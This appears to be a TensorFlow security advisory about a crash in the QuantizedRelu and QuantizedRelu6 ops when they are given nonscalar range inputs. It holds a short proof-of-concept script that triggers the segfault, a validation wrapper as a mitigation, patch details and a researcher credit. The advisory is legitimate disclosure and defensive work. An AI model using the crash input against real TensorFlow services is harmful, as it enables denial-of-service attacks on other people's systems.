If QuantizedRelu or QuantizedRelu6 are given nonscalar inputs for min_features or max_features, the result is a segfault that can be used to trigger a denial of service attack.
import tensorflow as tf

out_type = tf.quint8
features = tf.constant(28, shape=[4, 2], dtype=tf.quint8)
# min_features is an empty tensor of shape [0] and max_features has shape [1];
# both are nonscalar, which violates the ops' expectation and triggers the segfault.
min_features = tf.constant([], shape=[0], dtype=tf.float32)
max_features = tf.constant(-128, shape=[1], dtype=tf.float32)

tf.raw_ops.QuantizedRelu(features=features, min_features=min_features, max_features=max_features, out_type=out_type)
tf.raw_ops.QuantizedRelu6(features=features, min_features=min_features, max_features=max_features, out_type=out_type)
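Until an upgrade to a patched release is possible, one mitigation in user code is to validate the quantization range tensors before they reach the raw op. The sketch below is illustrative only: the wrapper safe_quantized_relu is a hypothetical helper, not part of TensorFlow, and the scalar range values are chosen arbitrarily to show the shape the op expects.

import tensorflow as tf

def safe_quantized_relu(features, min_features, max_features, out_type=tf.quint8):
    # Hypothetical guard: reject nonscalar range tensors up front instead of
    # letting them reach tf.raw_ops.QuantizedRelu, where they would crash
    # unpatched TensorFlow versions.
    min_features = tf.convert_to_tensor(min_features, dtype=tf.float32)
    max_features = tf.convert_to_tensor(max_features, dtype=tf.float32)
    if min_features.shape.rank != 0 or max_features.shape.rank != 0:
        raise ValueError("min_features and max_features must be scalar tensors")
    return tf.raw_ops.QuantizedRelu(
        features=features,
        min_features=min_features,
        max_features=max_features,
        out_type=out_type,
    )

features = tf.constant(28, shape=[4, 2], dtype=tf.quint8)
# Scalar range inputs satisfy the op's contract and do not trigger the crash.
result = safe_quantized_relu(features, min_features=-128.0, max_features=127.0)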
We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89.
The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.